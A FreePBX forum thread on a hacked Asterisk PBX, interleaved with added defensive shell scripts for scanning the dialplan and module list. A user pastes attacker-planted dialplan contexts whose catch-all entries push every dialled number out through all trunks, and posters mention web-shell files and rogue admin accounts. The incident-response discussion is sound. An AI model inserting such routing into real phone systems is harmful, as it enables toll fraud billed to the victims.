[OLD] Thankuhoh appears to be back

Had a fully updated system 13-19 and just found this in the etc/asterisk/extensions_custom.conf

What are the chances that if I delete this it will reinsert itself?

```
[inj3ctor3-outcall]; sorry_bitch
exten => _.,1,Macro(user-callerid,LIMIT,EXTERNAL,); sorry_bitch
exten => _.,n,Set(MOHCLASS=${IF($["${MOHCLASS}"=""]?default:${MOHCLASS})}); sorry_bitch
exten => _.,n,Set(_NODEST=); sorry_bitch
exten => _.,n,Macro(dialout-trunk,2,${EXTEN},,on); sorry_bitch
exten => _.,n,Macro(dialout-trunk,3,${EXTEN},,on); sorry_bitch
exten => _.,n,Macro(dialout-trunk,4,${EXTEN},,on); sorry_bitch
exten => _.,n,Macro(outisbusy,); sorry_bitch
[from-internal]; thankuohoh
exten => _.,1,Macro(user-callerid,LIMIT,EXTERNAL,); thankuohoh
exten => _.,n,Set(MOHCLASS=${IF($["${MOHCLASS}"=""]?default:${MOHCLASS})}); thankuohoh
exten => _.,n,Set(_NODEST=); thankuohoh
exten => _.,n,Macro(dialout-trunk,2,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(dialout-trunk,3,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(dialout-trunk,4,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(outisbusy,); thankuohoh
```

When you say it appears to be back, does that mean this system was compromised in a similar way in the past? If so, was the system cleaned or reinstalled? Before editing the file, get the output from:

```
stat /etc/asterisk/extensions_custom.conf
```

to see when the file was last edited.
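Beyond the timestamp check, a defender usually wants a repeatable scan of the custom dialplan for the two tell-tales visible in the pasted file: catch-all `_.` patterns (every dialled number is routed out to a trunk) and a FreePBX-generated context such as `[from-internal]` being redefined inside extensions_custom.conf, where only `*-custom` contexts belong. The following POSIX shell script is an added example, not code from the thread or from FreePBX; the sample file content, the short list of generated context names and the `scan_dialplan`/`count_findings` function names are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example (not from the thread): scan an Asterisk extensions_custom.conf
# for the indicators quoted in the post above. It flags
#   - catch-all "exten => _.," lines, which route every dialled number, and
#   - contexts that redefine a FreePBX-generated context (e.g. [from-internal])
#     inside the custom file, where only *-custom contexts are expected.
# Everything below is constructed for the demonstration; a real run would point
# at /etc/asterisk/extensions_custom.conf instead of the temp file.

DIALPLAN_SAMPLE="$(mktemp)"
trap 'rm -f "$DIALPLAN_SAMPLE"' EXIT
cat > "$DIALPLAN_SAMPLE" <<'EOF'
[from-internal-custom]
exten => 1234,1,NoOp(legitimate custom extension)
[inj3ctor3-outcall]; tag
exten => _.,1,Macro(user-callerid,LIMIT,EXTERNAL,); tag
exten => _.,n,Macro(dialout-trunk,2,${EXTEN},,on); tag
[from-internal]; tag
exten => _.,1,Macro(user-callerid,LIMIT,EXTERNAL,); tag
EOF

# Generated contexts that should never be (re)defined in extensions_custom.conf
# (assumed short list; extend it for your own deployment).
GENERATED_CONTEXTS="from-internal from-pstn from-trunk outbound-allroutes"

# scan_dialplan FILE
# Prints one "kind|context|line-number|text" record per finding and returns
# 1 if anything was flagged, 0 if the file looks clean.
scan_dialplan() {
    file="$1"; ctx=""; n=0; hits=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case "$line" in
            \[*\]*)
                # Context header: remember the name, then check it against the list.
                ctx=$(printf '%s\n' "$line" | sed 's/^\[\([^]]*\)\].*/\1/')
                for g in $GENERATED_CONTEXTS; do
                    if [ "$ctx" = "$g" ]; then
                        printf 'redefined-context|%s|%d|%s\n' "$ctx" "$n" "$line"
                        hits=$((hits + 1))
                    fi
                done ;;
            *"exten => _.,"*)
                # Catch-all pattern: classic toll-fraud routing entry.
                printf 'catch-all|%s|%d|%s\n' "$ctx" "$n" "$line"
                hits=$((hits + 1)) ;;
        esac
    done < "$file"
    [ "$hits" -eq 0 ]
}

# count_findings FILE -> number of flagged lines (convenient for alerting)
count_findings() { scan_dialplan "$1" | wc -l | tr -d ' '; }

# Stand-alone run: list findings, then show the file's timestamp as the thread does.
if scan_dialplan "$DIALPLAN_SAMPLE"; then
    echo "no suspicious entries in $DIALPLAN_SAMPLE"
else
    echo "review $DIALPLAN_SAMPLE:"
    ls -l "$DIALPLAN_SAMPLE"
fi
```

On the constructed sample the scan reports one redefined context and three catch-all lines; run it against the real file (and against extensions_override_freepbx.conf, which is loaded the same way) before cleaning, so the findings and the `stat` output are recorded together.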

```
stat /etc/asterisk/extensions_custom.conf
  File: `/etc/asterisk/extensions_custom.conf'
  Size: 658             Blocks: 8          IO Block: 4096   regular file
Device: 802h/2050d      Inode: 1574607     Links: 1
Access: (0664/-rw-rw-r--)  Uid: (  499/asterisk)   Gid: (  498/asterisk)
Access: 2017-03-10 11:03:36.808453731 -0500
Modify: 2017-03-10 11:03:36.780455311 -0500
Change: 2017-03-10 11:03:36.780455311 -0500
```

We have a large number of systems out there and I’ve already heard from 3 people this morning.

None of the systems that I have worked on today showed signs of being compromised at an earlier date, as far as I know.

Please post the output of

```
fwconsole ma list
```

and wrap it in triple backticks

``` YOUR OUTPUT ```
```
| announcement         | 13.0.6      | Enabled                                 | GPLv3+     |
| areminder            | 13.0.10.5   | Enabled                                 | Commercial |
| arimanager           | 13.0.4      | Enabled                                 | GPLv3+     |
| asterisk-cli         | 13.0.4      | Enabled                                 | GPLv3+     |
| asteriskinfo         | 13.0.7      | Enabled                                 | GPLv3+     |
| backup               | 13.0.26.1   | Enabled                                 | GPLv3+     |
| blacklist            | 13.0.14     | Enabled                                 | GPLv3+     |
| bria                 | 13.0.20     | Enabled                                 | Commercial |
| broadcast            | 13.0.12.5   | Enabled                                 | Commercial |
| builtin              |             | Enabled                                 |            |
| bulkdids             | 13.0.2      | Enabled                                 | GPLv3+     |
| bulkextensions       | 13.0.3      | Enabled                                 | GPLv3+     |
| bulkhandler          | 13.0.14.4   | Enabled                                 | GPLv3+     |
| callback             | 13.0.5      | Enabled                                 | GPLv3+     |
| callerid             | 13.0.8.1    | Enabled                                 | Commercial |
| callforward          | 13.0.4      | Enabled                                 | AGPLv3+    |
| calllimit            | 13.0.5.2    | Enabled                                 | Commercial |
| callrecording        | 13.0.11.1   | Enabled                                 | AGPLv3+    |
| callwaiting          | 13.0.4.1    | Enabled                                 | GPLv3+     |
| campon               | 13.0.4.1    | Enabled                                 | GPLv3+     |
| cdr                  | 13.0.30.5   | Enabled                                 | GPLv3+     |
| cel                  | 13.0.26.2   | Enabled                                 | GPLv3+     |
| certman              | 13.0.36.1   | Enabled                                 | AGPLv3+    |
| cidlookup            | 13.0.12.1   | Enabled                                 | GPLv3+     |
| conferences          | 13.0.23.1   | Enabled                                 | GPLv3+     |
| conferencespro       | 13.0.27.1   | Enabled                                 | Commercial |
| configedit           | 13.0.7      | Enabled                                 | AGPLv3+    |
| contactmanager       | 13.0.42.3   | Enabled                                 | GPLv3+     |
| core                 | 13.0.118.11 | Enabled                                 | GPLv3+     |
| cos                  | 13.0.11.2   | Enabled                                 | Commercial |
| customappsreg        | 13.0.5      | Enabled                                 | GPLv3+     |
| cxpanel              | 13.0.3.3    | Enabled                                 | GPLv3      |
| dahdiconfig          | 13.0.33.12  | Enabled                                 | GPLv3+     |
| dashboard            | 13.0.25     | Enabled                                 | AGPLv3+    |
| daynight             | 13.0.13     | Enabled                                 | GPLv3+     |
| dictate              | 13.0.5      | Enabled                                 | GPLv3+     |
| digium_phones        | 13.0.5      | Enabled                                 | GPLv2      |
| digiumaddoninstaller | 2.11.0.12   | Disabled                                | GPLv2      |
| directory            | 13.0.18     | Enabled                                 | GPLv3+     |
| directorypro         | 2.11.0.1    | Disabled                                | Commercial |
| disa                 | 13.0.6      | Enabled                                 | AGPLv3+    |
| donotdisturb         | 13.0.3      | Enabled                                 | GPLv3+     |
| endpoint             | 13.0.103.1  | Enabled                                 | Commercial |
| extensionroutes      | 13.0.10     | Enabled                                 | Commercial |
| fax                  | 13.0.40     | Enabled                                 | GPLv3+     |
| faxpro               | 13.0.38.2   | Enabled                                 | Commercial |
| featurecodeadmin     | 13.0.6.3    | Enabled                                 | GPLv3+     |
| findmefollow         | 13.0.38.6   | Enabled                                 | GPLv3+     |
| firewall             | 13.0.43.1   | Enabled                                 | AGPLv3+    |
| framework            | 13.0.190.19 | Enabled                                 | GPLv2+     |
| freepbx_ha           | 13.0.10.1   | Enabled                                 | Commercial |
| fw_langpacks         | 12.0.7      | Enabled                                 | GPLv3+     |
| hotelwakeup          | 13.0.16     | Enabled                                 | GPLv2      |
| iaxsettings          | 13.0.6.1    | Enabled                                 | AGPLv3     |
| infoservices         | 13.0.1      | Enabled                                 | GPLv2+     |
| irc                  | 2.11.0.7    | Enabled                                 | GPLv3+     |
| ivr                  | 13.0.26.1   | Enabled                                 | GPLv3+     |
| ivrpro               | 2.11.0.4    | Disabled                                | Commercial |
| javassh              | 2.11.2      | Enabled                                 | AGPLv3+    |
| languages            | 13.0.6      | Enabled                                 | GPLv3+     |
| logfiles             | 13.0.10.2   | Enabled                                 | GPLv3+     |
| manager              | 13.0.2.5    | Enabled                                 | GPLv2+     |
| miscapps             | 13.0.2.4    | Enabled                                 | GPLv3+     |
| miscdests            | 13.0.4      | Enabled                                 | GPLv3+     |
| music                | 13.0.22     | Enabled                                 | GPLv3+     |
| nimbusvoiceskin      | 13.0.3      | Enabled                                 | Commercial |
| outroutemsg          | 13.0.2      | Enabled                                 | GPLv3+     |
| paging               | 13.0.25.2   | Enabled                                 | GPLv3+     |
| pagingpro            | 13.0.19.3   | Enabled                                 | Commercial |
| parking              | 13.0.19.3   | Enabled                                 | GPLv3+     |
| parkpro              | 13.0.30.1   | Enabled                                 | Commercial |
| pbdirectory          | 2.11.0.5    | Enabled                                 | GPLv3+     |
| phonebook            | 13.0.5.5    | Enabled                                 | GPLv3+     |
| phpinfo              | 2.11.0.1    | Disabled                                | GPLv2+     |
| pinsets              | 13.0.8      | Enabled                                 | GPLv3+     |
| pinsetspro           | 2.11.0.11   | Disabled                                | Commercial |
| presencestate        | 13.0.7      | Enabled                                 | GPLv3+     |
| printextensions      | 13.0.3      | Enabled                                 | GPLv3+     |
| queueprio            | 13.0.2      | Enabled                                 | GPLv3+     |
| queues               | 13.0.32.5   | Enabled                                 | GPLv2+     |
| qxact_reports        | 13.0.15.2   | Enabled                                 | Commercial |
| recording_report     | 12.0.4      | Disabled                                | Commercial |
| recordings           | 13.0.30.6   | Enabled                                 | GPLv3+     |
| restapi              | 13.0.21     | Enabled                                 | AGPLv3     |
| restapps             | 12.0.44     | Disabled                                | Commercial |
| ringgroups           | 13.0.22.1   | Enabled                                 | GPLv3+     |
| rmsadmin             | 13.0.12     | Enabled                                 | Commercial |
| sangomacrm           | 13.0.1.11   | Enabled                                 | Commercial |
| setcid               | 13.0.5.1    | Enabled                                 | GPLv3+     |
| sipsettings          | 13.0.24.3   | Enabled                                 | AGPLv3+    |
| sipstation           | 13.0.13.13  | Enabled                                 | Commercial |
| sms                  | 13.0.11.1   | Enabled                                 | Commercial |
| sng_mcu              | 13.0.3      | Enabled                                 | Commercial |
| soundlang            | 13.0.24.3   | Enabled                                 | GPLv3+     |
| speeddial            | 2.11.0.4    | Enabled                                 | GPLv3+     |
| superfecta           | 13.0.3.22   | Enabled                                 | GPLv2+     |
| sysadmin             | 13.0.73.9   | Enabled                                 | Commercial |
| timeconditions       | 13.0.33.2   | Enabled                                 | GPLv3+     |
| tts                  | 13.0.8      | Enabled                                 | GPLv3+     |
| ttsengines           | 13.0.7      | Enabled                                 | AGPLv3     |
| ucp                  | 13.0.41.4   | Enabled                                 | AGPLv3+    |
| ucpnode              | 13.0.32.9   | Disabled; Pending upgrade to 13.0.33.9  | Commercial |
| userman              | 13.0.75.4   | Enabled                                 | AGPLv3+    |
| versionupgrade       |             | Not Installed (Locally available)       | Commercial |
| vmblast              | 13.0.8      | Enabled                                 | GPLv3+     |
| vmnotify             | 13.0.18.2   | Enabled                                 | Commercial |
| voicemail            | 13.0.53.6   | Enabled                                 | GPLv3+     |
| voicemail_report     | 13.0.13.1   | Enabled                                 | Commercial |
| vqplus               | 13.0.26.1   | Enabled                                 | Commercial |
| weakpasswords        | 13.0.2      | Enabled                                 | GPLv3+     |
| webcallback          | 13.0.11.1   | Enabled                                 | Commercial |
| webrtc               | 13.0.32.3   | Enabled                                 | GPLv3+     |
| xmpp                 | 13.0.14     | Enabled                                 | AGPLv3     |
| zulu                 | 13.0.49.9   | Disabled; Pending upgrade to 13.0.50.17 | Commercial |
+----------------------+-------------+-----------------------------------------+------------+
```

System seems like a restore, as once this is run it deletes itself. In 13 you can’t download it from the mirror, which means it could only have appeared here if this system was 12 at some point.

I checked another system that was just programmed and shipped out a few weeks ago and found the same versionupgrade - Not installed in the fwconsole ma list.

From where? We do not include that module in 13. The only way you can get it is through version 12.

We are one of your OEM partners. We start with a Version 13 Distro on every system we ship out.

I am having our team look into this but from a quick glance we do not include that module. Can you tell me more about what’s in it?

Probably a dumb question - How do I go about telling you what’s in it? (if it is Not Installed)

```
ls -l /var/www/html/admin/modules/versionupgrade

drwxrwxr-x 7 asterisk asterisk  4096 May 17  2016 assets
-rw-rw-r-- 1 asterisk asterisk  3308 May 17  2016 functions.inc.php
drwxrwxr-x 5 asterisk asterisk  4096 May 17  2016 i18n
-rw-rw-r-- 1 asterisk asterisk     6 May 17  2016 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 17  2016 LICENSE
-rw-rw-r-- 1 asterisk asterisk  5026 May 17  2016 module.sig
-rw-rw-r-- 1 asterisk asterisk  1287 May 17  2016 module.xml
-rw-rw-r-- 1 asterisk asterisk    94 May 17  2016 page.versionupgrade.php
-rw-rw-r-- 1 asterisk asterisk 29099 May 17  2016 Versionupgrade.class.php
drwxrwxr-x 2 asterisk asterisk  4096 May 17  2016 views
```

It might also be helpful that in all cases today there have been numerous php files in the var/www/html folder:

```
lol.php
in.php
io.php
```

just to name a few. They have been deleted. In each case there are users created within administration - Zizo, Injector, and others. Outbound routes have a `.` inserted in the dialplan, and in some cases a brand new outbound route is created with every trunk possible inserted in the trunk section.

Probably more information than you are interested in but thought I would include it.

I have a new site with the exact same issues but I haven’t cleaned it yet. Would it help you to see anything about the system before I clean it?

Yes, please PM me with the IP address.

Is there anything that everyone else should be concerned with at this point? Should we all be checking anything specific in our systems?

No. This was from the hack back in August. Specifically http://wiki.freepbx.org/display/FOP/2016-08-09+CVE+Remote+Command+Execution+with+Privileged+Escalation

The system was hacked around this time. Then cleaned up and upgraded. However cleanup processes don’t always remove every file (which is why we don’t recommend it). In this case the hacker left multiple backdoors (and by multiple I am talking about 10 different entry points).

We always let our community know immediately if there is something to be concerned about.


@tm1000 Just a note: the command-line upgrade scripts to update a FreePBX Distro run the

```
fwconsole ma installall
```

command, thus installing any module offered by the repository, based on the selection previously made on the Module Admin GUI interface.

The “versionupgrade” FreePBX Module might have been on the disk - not installed but present locally - and the above command would install it again.

A standard FreePBX Distro set up from scratch installs ALL modules, including the commercial ones.

Not having all modules installed, but only those effectively in use, reduces the attack surface, minimises the dialplan footprint, speeds up reloads and updates.

We ALWAYS patch the update scripts with a sed one-liner:

```
for i in upgrade*; do sed s/installall/upgradeall/ "$i" > OK && mv -f OK "$i"; done
```

This way, only the existing, installed modules are upgraded.

If other updates to the wider system or OS require new FreePBX Modules to be installed, the dependencies will (should!) pull them and install them.
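The point made in this post, and the `versionupgrade` row flagged earlier in the thread, both come down to the same question: which modules does `fwconsole ma list` show as present on disk but not installed, since those are exactly what `installall` would pull in. The following POSIX shell script (an added example, not code from the thread or from FreePBX) parses the table format shown above and answers that. The sample rows are constructed from the thread's own table; the function names and the assumption that the first `|` row is the header are mine.

```shell
#!/bin/sh
# Added example (not from the thread): parse "fwconsole ma list" output and
# report modules that are locally available but not installed (the set that
# "fwconsole ma installall" would install during an upgrade), plus every
# module whose status is anything other than plain "Enabled".

# Constructed sample in the table format shown earlier in the thread. A real
# run would use:  fwconsole ma list > "$MALIST_SAMPLE"
MALIST_SAMPLE="$(mktemp)"
trap 'rm -f "$MALIST_SAMPLE"' EXIT
cat > "$MALIST_SAMPLE" <<'EOF'
+----------------------+-------------+-----------------------------------------+------------+
| Module               | Version     | Status                                  | License    |
+----------------------+-------------+-----------------------------------------+------------+
| core                 | 13.0.118.11 | Enabled                                 | GPLv3+     |
| phpinfo              | 2.11.0.1    | Disabled                                | GPLv2+     |
| versionupgrade       |             | Not Installed (Locally available)       | Commercial |
| zulu                 | 13.0.49.9   | Disabled; Pending upgrade to 13.0.50.17 | Commercial |
+----------------------+-------------+-----------------------------------------+------------+
EOF

# Shared awk body: split on "|", skip border rows (they start with "+") and the
# first "|" row, which is assumed to be the header; columns are
# $2 = module, $3 = version, $4 = status, $5 = license.
_ma_rows() {
    awk -F'|' -v mode="$2" '
        /^\|/ {
            if (++row == 1) next
            name = $2; status = $4
            gsub(/^ +| +$/, "", name); gsub(/^ +| +$/, "", status)
            if (mode == "locally")  { if (status ~ /^Not Installed \(Locally available\)/) print name }
            else                    { if (status != "Enabled") print name "|" status }
        }' "$1"
}

# not_installed_locally FILE -> module names present on disk but not installed.
# Anything listed here is what "fwconsole ma installall" would install.
not_installed_locally() { _ma_rows "$1" locally; }

# non_enabled FILE -> "module|status" for every module that is not simply Enabled
# (disabled, pending upgrade, not installed), for a quick review after an incident.
non_enabled() { _ma_rows "$1" all; }

# Stand-alone run.
echo "modules installall would add:"
not_installed_locally "$MALIST_SAMPLE"
echo "modules not in plain Enabled state:"
non_enabled "$MALIST_SAMPLE"
```

Run against the real `fwconsole ma list` output, the first list is what to remove from `/var/www/html/admin/modules/` (or confirm as wanted) before an upgrade script runs `installall`; the second is a compact review list, and both are cheap to diff between hosts or between snapshots of the same host.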